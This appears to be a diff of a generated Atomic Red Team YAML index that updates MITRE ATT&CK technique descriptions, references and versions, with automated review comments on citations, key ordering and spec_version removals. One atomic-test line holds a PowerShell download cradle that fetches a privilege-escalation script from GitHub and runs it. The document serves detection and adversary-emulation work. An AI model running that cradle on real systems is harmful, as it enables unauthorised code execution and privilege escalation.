- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
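Review bot: the new `Win32_ScheduledJob` sentence cites `(Citation: Malicious Life by Cybereason)`, which needs the matching `external_references` entry added further down in this patch; fine as long as both land together. Separately, the unchanged `at.allow`/`at.deny` lines below it are split mid-sentence with the file names on their own lines, the same stripped inline markup seen in the ListPlanting description.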
@@ -49749,7 +50009,7 @@ privilege-escalation:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -49783,8 +50043,8 @@ privilege-escalation:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -49793,6 +50053,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
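Review bot: the Cybereason URL ends in `#blog-subscribe`, which is a page-anchor fragment rather than part of the article location; unless this is verbatim from upstream ATT&CK, drop the fragment so the link resolves to the article itself.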
@@ -49805,7 +50069,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests:
- name: At.exe Scheduled task
@@ -49968,7 +50231,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests:
- name: Process Injection via mavinject.exe
@@ -50017,6 +50279,65 @@ privilege-escalation:
executor:
command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')
name: powershell
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1546.007:
technique:
x_mitre_platforms:
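Review bot: in the new T1546.017 entry, `x_mitre_detection` is a single-quoted scalar that ends with a trailing space before the closing quote, and `/usr/lib/udev/rules.d/` is the only path in it not wrapped in backticks, unlike the five rule directories listed in the description. Both read as upstream text rather than generator bugs, so they belong in an upstream fix rather than a hand edit here; `"@grahamhelton3"` being double-quoted is correct, since a leading `@` is reserved in YAML. `atomic_tests: []` is expected for a freshly added sub-technique.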
@@ -50052,7 +50373,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -50076,7 +50397,6 @@ privilege-escalation:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests:
- name: Netsh Helper DLL Registration
@@ -50116,7 +50436,7 @@ privilege-escalation:
elevation_required: true
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -50200,11 +50520,10 @@ privilege-escalation:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -50256,9 +50575,8 @@ privilege-escalation:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests:
- name: Create local account with admin privileges
@@ -50557,7 +50875,7 @@ privilege-escalation:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -50595,8 +50913,6 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests:
- name: User scope COR_PROFILER
@@ -50732,23 +51048,24 @@ privilege-escalation:
execution:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
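Review bot: the unchanged context line `can not access tasks created with schtasks` sits between two removed lines about `at.exe`, and the replacement paragraph (`Panel.(Citation: Stack Overflow) In some cases ...`) drops the deprecated `at` utility entirely, so either that line lost its `-` marker when the diff was rendered or the regenerated description string still carries a dangling fragment; open the resulting YAML and check the text between `Control Panel.(Citation: Stack Overflow)` and `An adversary may use Windows Task Scheduler`. The new sentence also cites `Red Canary - Atomic Red Team` for the `Invoke-CimMethod` / `PS_ScheduledTask` claim, which is upstream ATT&CK citing this repository; that is fine for generated data but is a reason not to hand-edit the description here.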
@@ -50795,7 +51112,7 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -50827,8 +51144,8 @@ execution:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -50842,6 +51159,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
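Review bot: the new `Red Canary - Atomic Red Team` reference points at `blob/master/atomics/T1053.005/T1053.005.md`, an unpinned URL into this same repository, so the cited page can drift from what was retrieved on June 19, 2024. The citation is owned by upstream ATT&CK and should stay as generated; just be aware that a later edit to T1053.005.md silently changes what the description is citing.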
@@ -50854,11 +51175,14 @@ execution:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests:
- name: Scheduled Task Startup Script
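Review bot: `spec_version: '2.1'` is removed from this technique object with no replacement, and the same removal recurs for every other technique object in this patch (T1047, T1129, T1059.007, T1053.007, T1559.002, T1204.002, T1053.003, T1559.001, T1053, T1059.002, T1106, T1059.010, T1059.009, T1610, T1059, T1609, T1569.001). STIX 2.1 requires `spec_version` on every object, so any consumer that treats the `technique` mapping as a STIX object will now fail validation; if the field is being dropped deliberately to mirror the upstream ATT&CK export, state that in the PR description so the change is not mistaken for a generator regression.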
@@ -51237,7 +51561,7 @@ execution:
schtasks /Delete /TN "#{task_name}" /F
T1047:
technique:
- modified: '2024-04-11T18:13:25.130Z'
+ modified: '2024-10-15T15:20:57.328Z'
name: Windows Management Instrumentation
description: |-
Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -51303,7 +51627,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1047
atomic_tests:
- name: WMI Reconnaissance Users
@@ -51614,7 +51937,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1129
atomic_tests:
- name: ESXi - Install a custom VIB on an ESXi host
@@ -51681,61 +52003,7 @@ execution:
elevation_required: false
T1059.007:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Cody Thomas, SpecterOps
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
- type: attack-pattern
- created: '2020-06-23T19:12:24.924Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1059.007
- url: https://attack.mitre.org/techniques/T1059/007
- - source_name: NodeJS
- url: https://nodejs.org/
- description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
- - source_name: JScrip May 2018
- url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
- description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
- June 23, 2020.
- - source_name: Microsoft JScript 2007
- url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
- description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
- ECMAScript …. Retrieved June 23, 2020.
- - source_name: Microsoft Windows Scripts
- url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
- description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
- June 23, 2020.
- - source_name: Apple About Mac Scripting 2016
- url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
- description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
- 14, 2021.
- - source_name: SpecterOps JXA 2020
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
- 2021.
- - source_name: SentinelOne macOS Red Team
- url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
- description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
- APIs Without Building Binaries. Retrieved July 17, 2020.'
- - source_name: Red Canary Silver Sparrow Feb2021
- url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
- description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
- wings: Outing macOS malware before it takes flight. Retrieved April 20,
- 2021.'
- - source_name: MDSec macOS JXA and VSCode
- url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
- description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
- with VSCode Extensions. Retrieved April 20, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-07-30T14:12:52.698Z'
name: 'Command and Scripting Interpreter: JavaScript'
description: |-
Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
@@ -51748,26 +52016,78 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_contributors:
+ - Cody Thomas, SpecterOps
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Monitor for execution of JXA through osascript
and usage of OSAScript
API that may be related to other suspicious behavior occurring on the system.
Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+ created: '2020-06-23T19:12:24.924Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/007
+ external_id: T1059.007
+ - source_name: Apple About Mac Scripting 2016
+ description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+ 14, 2021.
+ url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+ - source_name: MDSec macOS JXA and VSCode
+ description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+ with VSCode Extensions. Retrieved April 20, 2021.
+ url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+ - source_name: Microsoft JScript 2007
+ description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+ ECMAScript …. Retrieved June 23, 2020.
+ url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+ - source_name: Microsoft Windows Scripts
+ description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+ - source_name: JScrip May 2018
+ description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+ - source_name: NodeJS
+ description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+ url: https://nodejs.org/
+ - source_name: SentinelOne macOS Red Team
+ description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+ APIs Without Building Binaries. Retrieved July 17, 2020.'
+ url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+ - source_name: SpecterOps JXA 2020
+ description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+ 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: Red Canary Silver Sparrow Feb2021
+ description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+ wings: Outing macOS malware before it takes flight. Retrieved April 20,
+ 2021.'
+ url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.007
atomic_tests:
- name: JScript execution to gather local computer information via cscript
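Review bot: most of this hunk is a reorder rather than a content change: all nine external references removed in the previous hunk (`NodeJS`, `JScrip May 2018`, `Microsoft JScript 2007`, `Microsoft Windows Scripts`, `Apple About Mac Scripting 2016`, `SpecterOps JXA 2020`, `SentinelOne macOS Red Team`, `Red Canary Silver Sparrow Feb2021`, `MDSec macOS JXA and VSCode`) reappear here in a different order, with the `JScrip May 2018` source_name typo carried over from upstream, and `x_mitre_platforms`, `x_mitre_domains` and `x_mitre_contributors` move from the top of the object to the middle. The substantive changes are the version bump to `2.2`, the new `x_mitre_deprecated: false`, `revoked: false` and `x_mitre_remote_support: false` fields, and the attack spec moving to `3.2.0`. A generator that preserved upstream key order would reduce this 60-line hunk to those few lines and make the content change reviewable.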
@@ -51823,7 +52143,7 @@ execution:
name: command_prompt
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -51881,9 +52201,8 @@ execution:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests:
- name: ListCronjobs
@@ -52044,7 +52363,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1559.002
atomic_tests:
- name: Execute Commands
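Review bot: T1559.002 loses `spec_version` here but keeps `x_mitre_attack_spec_version: 3.1.0` (unchanged context line), whereas every other object in this patch that loses `spec_version` either already sits at `3.2.0` or is moved to it in the same change. Confirm that upstream still publishes T1559.002 at 3.1.0 rather than this entry being merged from a stale bundle.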
@@ -52117,15 +52435,15 @@ execution:
name: manual
T1204.002:
technique:
- modified: '2023-04-21T12:22:19.740Z'
+ modified: '2024-09-25T20:50:34.876Z'
name: 'User Execution: Malicious File'
description: "An adversary may rely upon a user opening a malicious file in
order to gain execution. Users may be subjected to social engineering to get
them to open a file that will lead to code execution. This user action will
typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
Adversaries may use several types of files that require a user to execute
- them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
- may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+ them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+ .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
to increase the likelihood that a user will open and successfully execute
a malicious file. These methods may include using a familiar naming convention
@@ -52153,7 +52471,7 @@ execution:
- Linux
- macOS
- Windows
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -52173,9 +52491,8 @@ execution:
url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
